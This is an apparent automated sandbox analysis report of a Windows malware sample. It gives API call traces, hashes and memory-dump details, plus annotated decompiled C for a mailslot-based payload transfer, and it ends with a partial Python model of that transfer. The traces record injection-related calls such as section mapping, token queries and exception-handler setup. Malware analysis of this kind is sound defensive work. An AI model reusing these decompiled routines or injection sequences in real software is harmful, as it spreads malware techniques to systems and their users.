    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

General

Root Process Name:d3d8sext.exe
Process MD5:F3C6625D8EDE3FE6C8C4023337D761AC
Total matches:150
Initial Analysis Report:Open
Initial sample Analysis ID:66739
Initial sample SHA 256:A93182CDCDE8030CAC64378DA0406C7F628486EC1CF41B6E49CF5A551C0AB837
Initial sample name:03290.exe

Similar Executed Functions

Similarity
  • Total matches: 38
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID: pnls
  • API String ID: 82859500-141991303
  • Opcode ID: 0e930324d983736687636c65484061bdc5c26c6a22796dc9d5b5e2d04a25d73d
  • Instruction ID: 4054d890b24571a5ce529a27dba078d21a52d3d947ce336da07b5894b94e827b
  • Opcode Fuzzy Hash: 7821C045058D4286DDE3B8960613F97E142FF43F88C9CFBA4B49A6669F0E04311AEB4F
  • Instruction Fuzzy Hash: 4054d890b24571a5ce529a27dba078d21a52d3d947ce336da07b5894b94e827b
APIs
    • Part of subcall function 01B3278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
    • Part of subcall function 01B3278F: memset.NTDLL ref: 01B3280F
    • Part of subcall function 01B3278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
    • Part of subcall function 01B3278F: NtClose.NTDLL(?), ref: 01B3283F
  • memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
  • memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31B66: GetModuleHandleA.KERNEL32(01B380DB,?,CCCCFEEB,01B31E8C,?,?,?,00000000), ref: 01B31B99
    • Part of subcall function 01B31B66: memcpy.NTDLL(?,3!?w,00000018,01B3845C,01B38400,01B38451), ref: 01B31C04
  • memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B339A5: memset.NTDLL ref: 01B339C4
    • Part of subcall function 01B31C13: memcpy.NTDLL(CCCCFEEB,01B37478,00000018,CCCCFEEB,01B3845C,CCCCFEEB,01B38400,CCCCFEEB,01B38451,CCCCFEEB,01B31E84,?,01B323F9,?,?,00000000), ref: 01B31CA4
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
  • CloseHandle.KERNEL32(00000000), ref: 01B31EE0
  • memset.NTDLL ref: 01B31EF4
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
    • Part of subcall function 01B3284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 01B328AE
    • Part of subcall function 01B3284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 01B328C3
    • Part of subcall function 01B3284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 01B32905
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}


APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			// Mailslot sender: the client side of the \\.\mailslot\msl0 channel whose receiver
			// is E00401033 (decompiled further down). E0040171F turns the descriptor at _a4 into
			// a heap buffer (pointer returned through _a4, length through _v24); that buffer is
			// written to the slot in messages of at most 0x1000 bytes, then wiped and freed.
			// Returns a Win32 error code, 0 on success. The trailing hex comments are the
			// report's per-line instruction addresses.
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;  // decompiler type guess; actually the send offset into the payload
				long _v12;   // error code returned to the caller
				long _v16;   // bytes to write / bytes written per WriteFile
				void* _v20;  // handle to the mailslot
				void* _v24;  // total payload length from E0040171F
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;   // bytes still to send
				void* _t48;
				void* _t52;  // payload buffer

				_t48 = __edi;  // 0x004010fb
				_t45 = __ebx;  // 0x004010fb
				_v8 = 0;  // 0x00401104
				do {  // 0x00401107
					// GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, OPEN_EXISTING
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed, 0x00401118
					_v20 = _t28;  // 0x00401121
					if(_t28 != 0xffffffff) {  // INVALID_HANDLE_VALUE, 0x00401124
						_v12 = 0;  // 0x00401139
					} else {  // 0x00401126
						_v12 = GetLastError();  // 0x0040112e
						Sleep(0x64);  // 0x00401131
					}  // 0x00401131
				// 2 == ERROR_FILE_NOT_FOUND: the receiver has not created the slot yet, retry every 100 ms
				} while (_v12 == 2);  // 0x0040113c
				if(_v12 != 0) {  // 0x00401145
					L19:  // 0x004011ea
					return _v12;  // 0x004011ef
				}  // 0x004011ef
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed, 0x00401158
				if(_t34 == 0) {  // 0x0040115f
					_v12 = 0xb;  // ERROR_BAD_FORMAT, 0x004011da
					L18:  // 0x004011e1
					CloseHandle(_v20);  // 0x004011e4
					goto L19;
				}  // 0x004011e4
				_t52 = _a4;  // 0x00401161
				_push(_t45);  // callee-saved register residue, 0x00401164
				_t46 = _v24;  // 0x00401165
				_push(_t48);  // 0x00401168
				do {  // 0x0040116e
					// one mailslot message per WriteFile, at most 0x1000 bytes (the receiver's nMaxMessageSize)
					_v16 = _t46;  // 0x00401170
					if(_t46 >= 0x1000) {  // 0x00401173
						_v16 = 0x1000;  // 0x00401175
					}  // 0x00401175
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed, 0x0040118a
					if(_t39 == 0) {  // 0x00401192
						_t40 = GetLastError();  // 0x004011a8
						_v12 = _t40;  // 0x004011b1
						// 0x79 == ERROR_SEM_TIMEOUT: sleep and resend the same chunk; any other error aborts
						if(_t40 != 0x79) {  // 0x004011b4
							break;
						}
					} else {  // 0x00401194
						_t43 = _v16;  // 0x00401194
						_v8 = _v8 + _t43;  // 0x00401197
						_t46 = _t46 - _t43;  // 0x0040119a
						// If the payload ended on a full 0x1000-byte message, back up one byte and send it
						// again as a 1-byte message: the receiver stops only on a message shorter than 0x1000.
						if(_t46 == 0 && _t43 == 0x1000) {  // 0x0040119c
							_t46 = _t46 + 1;  // 0x004011a2
							_v8 = _v8 - 1;  // 0x004011a3
						}  // 0x004011a3
					}  // 0x0040119c
					Sleep(0x64); // executed, 0x004011b8
				} while (_t46 != 0);  // 0x004011be
				memset(_t52, 0, _v8);  // wipe the sent payload, 0x004011c8
				E00401207(_t52);  // HeapFree, 0x004011d1
				goto L18;
			}

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			// Mailslot receiver: the server side of the \\.\mailslot\msl0 channel whose sender
			// is E004010FB above. Creates the slot, appends each message to a heap buffer that
			// is grown by 0x1000 bytes per message, and on success stores the buffer pointer at
			// _a4+4 and the received length at _a4+8. Returns a Win32 error code, 0 on success.
			// Decompiler residue to read past: _t41 is undeclared, _v12 (the buffer capacity)
			// has no visible initialisation, and the handle returned by CreateMailslotA is
			// stored into _v16 but passed to ReadFile and CloseHandle as _v20, while _v16 is
			// reused for the byte count. The trailing hex comments are the report's per-line
			// instruction addresses.
			E00401033(void* _a4) {
				signed int _v8;  // error code returned to the caller
				long _v12;       // heap buffer capacity
				long _v16;       // bytes returned by the last ReadFile
				void* _v20;      // mailslot handle (see note above)
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;      // heap buffer
				long _t39;       // bytes received so far

				_pop(_t41);  // 0x00401033
				_t39 = 0;  // 0x0040103d
				_v8 = 0x1000;  // 0x0040104c
				// nMaxMessageSize = 0x1000, lReadTimeout = 0: with nothing queued ReadFile fails
				// at once with ERROR_SEM_TIMEOUT, so the loop below polls every 100 ms.
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);  // 0x0040104f
				_v16 = _t24;  // 0x00401057
				if(_t24 == 0) {  // 0x0040105a
					_t25 = GetLastError();  // 0x004010d6
					_t36 = _a4;  // 0x004010dc
					_v8 = _t25;  // 0x004010df
				} else {  // 0x0040105c
					_t36 = E004011F2(0x1000);  // RtlAllocateHeap, 0x00401062
					if(_t36 == 0) {  // 0x00401066
						L10:  // 0x004010c4
						_v8 = 8;  // ERROR_NOT_ENOUGH_MEMORY, 0x004010c4
					} else {  // 0x00401068
						do {  // 0x00401068
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed, 0x00401076
							if(_t32 == 0) {  // 0x0040107e
								_t33 = GetLastError();  // 0x004010a4
								_v8 = _t33;  // 0x004010ad
								// 0x79 == ERROR_SEM_TIMEOUT: nothing queued yet; force the loop condition true and keep polling
								if(_t33 == 0x79) {  // 0x004010b0
									_v16 = 0x1000;  // 0x004010b2
									goto L8;
								}  // 0x004010b2
							} else {  // 0x00401080
								_v12 = _v12 + 0x1000;  // 0x00401080
								_t39 = _t39 + _v16;  // 0x00401086
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed, 0x00401092
								_t36 = _t34;  // 0x00401098
								if(_t36 == 0) {  // 0x0040109c
									goto L10;
								} else {  // 0x0040109e
									_v8 = _v8 & 0x00000000;  // 0x0040109e
									goto L8;
								}  // 0x0040109e
							}  // 0x0040109c
							goto L11;
							L8:  // 0x004010b5
							Sleep(0x64); // executed, 0x004010b7
						// a message shorter than 0x1000 bytes ends the transfer (the sender guarantees one)
						} while (_v16 == 0x1000);  // 0x004010bd
					}  // 0x004010c2
					L11:  // 0x004010cb
					CloseHandle(_v20);  // 0x004010ce
				}  // 0x004010ce
				if(_v8 == 0) {  // 0x004010e6
					_t27 = _a4;  // 0x004010e8
					*(_t27 + 4) = _t36;  // received buffer, 0x004010eb
					*((intOrPtr*)(_t27 + 8)) = _t39;  // received length, 0x004010ee
				}  // 0x004010ee
				return _v8;  // 0x004010f8
			}

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
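The two decompiled functions above (E00401033 creating and draining the mailslot, E004010FB opening and writing it) implement a small chunked transfer over \\.\mailslot\msl0. The Python model below is an added example written for this report, not code from the sample or from Joe Sandbox: it replaces the Win32 mailslot with an in-memory queue (FakeMailslot and MailslotTimeout are constructed stand-ins) and reproduces the two loops so the framing rules can be checked offline, including the sender's back-up-one-byte trick for payloads that are an exact multiple of 0x1000 bytes and the retry-on-ERROR_SEM_TIMEOUT path both loops share. The retry caps are additions for the example; the sample polls without bound, and its open-with-retry loop (CreateFileA every 100 ms while ERROR_FILE_NOT_FOUND) is not modelled.

```python
"""Chunked transfer over \\\\.\\mailslot\\msl0 as implemented by E00401033 (receiver:
CreateMailslotA/ReadFile) and E004010FB (sender: CreateFileA/WriteFile), modelled
over an in-memory queue. Added example for this report, not code from the sample or
from Joe Sandbox; FakeMailslot and MailslotTimeout are constructed stand-ins for the
Win32 mailslot and for a call failing with ERROR_SEM_TIMEOUT."""
from collections import deque

MAILSLOT_MAX_MSG = 0x1000  # CreateMailslotA(..., nMaxMessageSize=0x1000, ...)
ERROR_SEM_TIMEOUT = 0x79   # the one error code both loops retry on (after Sleep(0x64))


class MailslotTimeout(Exception):
    """Stand-in for ReadFile/WriteFile failing with GetLastError() == ERROR_SEM_TIMEOUT."""


class FakeMailslot:
    """FIFO of datagrams of at most max_msg bytes. Behaves as if created with
    lReadTimeout=0: a read with nothing queued fails immediately instead of blocking."""

    def __init__(self, max_msg=MAILSLOT_MAX_MSG, write_timeouts=0):
        self.max_msg = max_msg
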